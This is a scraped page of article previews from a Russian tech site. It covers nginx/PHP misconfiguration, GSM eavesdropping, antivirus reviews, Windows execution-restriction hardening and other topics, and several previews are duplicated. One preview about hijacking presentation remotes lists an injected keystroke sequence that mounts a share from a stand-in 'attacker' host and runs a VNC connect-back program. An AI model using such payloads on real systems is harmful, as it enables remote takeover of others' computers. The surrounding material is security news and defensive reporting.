Очередной раз пиная студентов в сторону таблички на стене учебной аудитории с переводом двоичного кода в десятичный мне пришло в голову сделать нечто светящееся, привлекающее внимание и обязательно с двоичным кодом. Для каждого студента на занятии самое важное, после фамилии преподавателя и предмета обучения, это когда же наступит перерыв. Так что я решил сделать двоичные часы и установить их в аудитории. Закончилась сессия, разбежались студенты, появилось немножко свободного времени и вот что у меня получилось
User
Уязвимость связки PHP+nginx с кривым конфигом
1 min
61KSummary
Announced: 2010-05-20
Credits: 80sec
Affects: сайты на ngnix+php с возможностью загрузки файлов в директории с fastcgi_pass
Background
Зачастую How-To по настройке связки nginx с php-fpm / php-cgi есть подобные строчки:
location ~ \.php$ {
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}
+129
На конференции Black Hat представлено ПО для дешифровки разговоров в GSM-сетях
2 min
5.9KНе так давно я уже писал о программном обеспечении "Kraken", которое посредством использования специальных криптографических таблиц помогает взламывать алгоритм шифрования A5/1 (именно он массово используется операторами мобильной связи) для GSM-сетей. Но одно дело — взлом алгоритма, и другое — полная расшифровка закодированного сигнала. Вот с этим «на ура» справляется новоявленное ПО, также представленное на конференции Black Hat. Вообще говоря, эта конференция принесла много чего неожиданного, начиная от того самого Kraken-а, и заканчивая взломом банкоматов. Так вот, на этот раз эксперт по криптографии Карстен Ногл представил усовершенствованный программный пакет Airprobe. По заявлению разработчика, это программное обеспечение вкупе с несколькими компонентами позволяет максимально упростить задачу расшифровки сигналов, передаваемых по GSM-сетям (Airprobe позволяет записывать и раскодировать разговоры и SMS).
+31
Хакер создал устройство прослушивания сотовых телефонов за $1,500
2 min
9.8KTranslation
Исследователь компьютерной безопасности всего за $1,500 создал устройство, которое может перехватывать звонки некоторых типов сотовых телефонов и выполнять запись разговоров.
Атака Криса Пагета (Chris Paget) в прошедшую субботу на Defcon продемонстрировала уязвимость стандарта GSM, одной из наиболее распространённых технологий сотовой связи.
+49
Сравнительный обзор бесплатных антивирусов
8 min
435KРешил я после обзора одного единственного антивируса AVG Antivirus 9.0 от хабравчанина Courteous написать свой и пройтись по бесплатным решениям в этой области.
Оценка антивирусов проводилась по трём параметрам — юзабилити (тут с моими оценками хабрасообщество может не согласиться), потребление ресурсов и надёжность (надёжность я оценивал по знаменитому архиву из 3732 вирусов).
A-Squared Free
Основные особенности a-squared Free 4.5
• Удаляет трояны, программы-шпионы (Spyware), рекламное ПО (Adware), интернет-червей, клавиатурных шпионов (Keyloggers), руткиты (Rootkits), звонильщики (Dialers) и другие угрозы.
• Прост в использовании и полностью бесплатен
• Более 4 млн. пользователей по всему миру
Для обладателей не слишком шустрого или лимитированного интернета минусом может являться факт начального обновления на 33мб.
Осторожно, под катом много скриншотов!
+155
Из России с торрентом: онлайн просмотр торрентов и не только
1 min
1.7KДобрый день!
Представляю сообществу храбра детище нашей команды разработчиков.
Встречайте MediaGet! media-get.ru
Его ранняя сыренькая версия уже была упомянута на хабре.
Сейчас уже программа претерпела множество доработок и в нее были добавлены новые фичи.
Наша задача была сделать торрент-клиент ориентированный как на опытных пользователей торрентов, так и на людей вообще не знакомых с p2p.
Представляю сообществу храбра детище нашей команды разработчиков.
Встречайте MediaGet! media-get.ru
Его ранняя сыренькая версия уже была упомянута на хабре.
Сейчас уже программа претерпела множество доработок и в нее были добавлены новые фичи.
Наша задача была сделать торрент-клиент ориентированный как на опытных пользователей торрентов, так и на людей вообще не знакомых с p2p.
+21
Kismet
7 min
83KKismet — это многофункциональная бесплатная утилита для работы с беспроводными сетями Wi-Fi. Пользователям она знакома в основном по статьям на тему взлома, где программа используется для обнаружения скрытых сетей или захвата пакетов. Взламывать чужие сети — плохо, а между тем Kismet — это гораздо больше чем отмычка в руках злоумышленника. В арсенале инженера информационной безопасности эта программа становится прекрасным инструментом для наблюдения и анализа эфира 802.11.
+81
Windows-компьютер без антивирусов
6 min
63KПредупреждение: Описанное в статье несколько устарело, т.к. я забросил винды в эпоху Windows 2003.
Каждый раз, когда меня знакомые спрашивают: «какой антивирус лучше?», я могу сказать только одно: «антивирус — как придворный шаман. Бывают лучше, бывают хуже, но определить, кто лучше камлает, не получится». Антивирус не гарантирует защиту от вирусов, более того, у него есть полное моральное право пропустить новую заразу и начать её детектить дня через 2-3 после «инцидента». Т.е. как основное средство защиты он годится не очень.
Ниже описывается настройка windows, которая позволит защититься от любых реальных (т.е. встречающихся в природе) вирусов без использования антивирусов. Данная конфигурация уже 3 с половиной года работает на терминальном сервере, где пользователи (в лучшие времена до 70 человек) совсем не стесняются притаскивать на флешках всяких засранцев, лазать по сети где попало и т.д.
Любой уважающий себя вирус, оказавшись запущенным, тем или иным методом стремится в системе закрепиться, т.е. создаёт исполняемый файл или библиотеку, которая прописывается тем или иным образом в запуск. «Авто» запуск или в форме «дополнения» к другим исполняемым файлам (debugger, hander, плагин, и т.д.) — не важно. Важно: существует барьер под названием «запуск кода». Даже старые-добрые вирусы, дописывающие себя в исполняемые файлы, всё равно должны иметь возможность писать в файлы, которые предполагается запускать.
Безусловно, есть вирусы, размножающиеся без создания файлов (например, мс-бласт). Но условием появления этого вируса должна быть доступность сервера для обращений с носителей вируса или запуск кода через эксплоит в браузере\сетевой компоненте. В случае дыры в браузере дальнейшее размножение не возможно (т.к. нужно обращаться к браузерам на других машинах, а это требует поднятия сервера, куда будут ходить другие пользователи и мотивации пользователям ходить именно на этот узел). В случае дыры в сетевой компоненте и размножения без сохранения на диск, описанная мною методика с большой вероятностью работать не будет и возможна эпидемия. Однако, я не уверен, что антивирусы поймают такой 0day эксплоит, плюс, их (дыры) довольно резво фиксят, так что этот сценарий я откладываю как маловероятный. Наличие же файрволов ещё более уменьшает их опасность. От не-0day вполне же спасает своевременная (автоматизированная) установка обновлений.
Итак, основную бытовую опасность представляют вирусы, запускающиеся «из файла» (хотя бы потому, что они переживают перезагрузку компьютера). Если мы запретим каким-то образом запуск «неправильных» файлов, то проблема будет решена (т.к. несохраняющийся в файле вирус не сможет пережить перезагрузку, а в случае запуска с правами пользователя, даже банального релогина).
В Windows существует технология — политика ограниченного запуска приложений. Её можно активировать в режиме «запрещать всё, что не разрешено». Если поставить запрет полный — для всех, включая администраторов, все файлы, включая библиотеки, то мы получим точную гарантию того, что посторонний (не входящий в список разрешённых) файл не будет запущен. По-крайней мере я пока не слышал, чтобы в этой технологии были дыры. Обращаю внимание, нужно запрещать и библиотеки тоже, потому что печально известный конфикер запускается с флешек именно с помощью запуска библиотеки обманом rundll32.
Однако, запреты и разрешения не будут иметь смысла, если не сформулировать правила, которые запретят запуск «чужаков».
Перед тем, как описать подробно конфигурацию, сформулирую теоретические принципы её организации:
1. То, куда пользователь может писать закрыто для запуска.
2. То, что пользователь может запускать, закрыто для записи.
Каждый раз, когда меня знакомые спрашивают: «какой антивирус лучше?», я могу сказать только одно: «антивирус — как придворный шаман. Бывают лучше, бывают хуже, но определить, кто лучше камлает, не получится». Антивирус не гарантирует защиту от вирусов, более того, у него есть полное моральное право пропустить новую заразу и начать её детектить дня через 2-3 после «инцидента». Т.е. как основное средство защиты он годится не очень.
Ниже описывается настройка windows, которая позволит защититься от любых реальных (т.е. встречающихся в природе) вирусов без использования антивирусов. Данная конфигурация уже 3 с половиной года работает на терминальном сервере, где пользователи (в лучшие времена до 70 человек) совсем не стесняются притаскивать на флешках всяких засранцев, лазать по сети где попало и т.д.
Теория
Любой уважающий себя вирус, оказавшись запущенным, тем или иным методом стремится в системе закрепиться, т.е. создаёт исполняемый файл или библиотеку, которая прописывается тем или иным образом в запуск. «Авто» запуск или в форме «дополнения» к другим исполняемым файлам (debugger, hander, плагин, и т.д.) — не важно. Важно: существует барьер под названием «запуск кода». Даже старые-добрые вирусы, дописывающие себя в исполняемые файлы, всё равно должны иметь возможность писать в файлы, которые предполагается запускать.
Безусловно, есть вирусы, размножающиеся без создания файлов (например, мс-бласт). Но условием появления этого вируса должна быть доступность сервера для обращений с носителей вируса или запуск кода через эксплоит в браузере\сетевой компоненте. В случае дыры в браузере дальнейшее размножение не возможно (т.к. нужно обращаться к браузерам на других машинах, а это требует поднятия сервера, куда будут ходить другие пользователи и мотивации пользователям ходить именно на этот узел). В случае дыры в сетевой компоненте и размножения без сохранения на диск, описанная мною методика с большой вероятностью работать не будет и возможна эпидемия. Однако, я не уверен, что антивирусы поймают такой 0day эксплоит, плюс, их (дыры) довольно резво фиксят, так что этот сценарий я откладываю как маловероятный. Наличие же файрволов ещё более уменьшает их опасность. От не-0day вполне же спасает своевременная (автоматизированная) установка обновлений.
Итак, основную бытовую опасность представляют вирусы, запускающиеся «из файла» (хотя бы потому, что они переживают перезагрузку компьютера). Если мы запретим каким-то образом запуск «неправильных» файлов, то проблема будет решена (т.к. несохраняющийся в файле вирус не сможет пережить перезагрузку, а в случае запуска с правами пользователя, даже банального релогина).
В Windows существует технология — политика ограниченного запуска приложений. Её можно активировать в режиме «запрещать всё, что не разрешено». Если поставить запрет полный — для всех, включая администраторов, все файлы, включая библиотеки, то мы получим точную гарантию того, что посторонний (не входящий в список разрешённых) файл не будет запущен. По-крайней мере я пока не слышал, чтобы в этой технологии были дыры. Обращаю внимание, нужно запрещать и библиотеки тоже, потому что печально известный конфикер запускается с флешек именно с помощью запуска библиотеки обманом rundll32.
Однако, запреты и разрешения не будут иметь смысла, если не сформулировать правила, которые запретят запуск «чужаков».
Модель безопасности
Перед тем, как описать подробно конфигурацию, сформулирую теоретические принципы её организации:
1. То, куда пользователь может писать закрыто для запуска.
2. То, что пользователь может запускать, закрыто для записи.
+79
Революция начинается сегодня
3 min
2KTranslation
После нескольких лет разработки, тысяч часов и более миллиона долларов собственных средств, мы с гордостью представляем релиз MODx Revoution 2.0.
MODx Revolution это совершенно новый MODx. Он является самой сутью того, что делает MODx отличной платформой для создания разнообразных веб-сайтов и насыщенных приложений (RIA), позволяя делать Вам больше и делать это лучше.
MODx Revolution 2.0 стал еще более мощным. Он может обслуживать высоконагруженные сайты, а также позволяет управлять мульти-сайтами и поддоменами из одной инсталляции системы.
Список новых возможностей и улучшений в MODx Revolution слишком велик для того, чтобы перечислить здесь каждое из них. Поэтому озвучим лишь те, которые, на наш взгляд, вы полюбите. Больше вы сможете узнать, попробовав MODx в деле самостоятельно или обратившись к списку изменений.
Что нового?
MODx Revolution это совершенно новый MODx. Он является самой сутью того, что делает MODx отличной платформой для создания разнообразных веб-сайтов и насыщенных приложений (RIA), позволяя делать Вам больше и делать это лучше.
MODx Revolution 2.0 стал еще более мощным. Он может обслуживать высоконагруженные сайты, а также позволяет управлять мульти-сайтами и поддоменами из одной инсталляции системы.
Список новых возможностей и улучшений в MODx Revolution слишком велик для того, чтобы перечислить здесь каждое из них. Поэтому озвучим лишь те, которые, на наш взгляд, вы полюбите. Больше вы сможете узнать, попробовав MODx в деле самостоятельно или обратившись к списку изменений.
+26
+174
Взлом компьютера через радиопульт для презентации
1 min
2.1KЕсли вам приходится выступать с презентациями перед большой аудиторией — будьте осторожны! Хакеры нашли способ удалённого взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления. Хуже того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.
1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]
Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.
1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]
Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.
+52
Information
- Rating
- Does not participate
- Location
- Украина
- Date of birth
- Registered
- Activity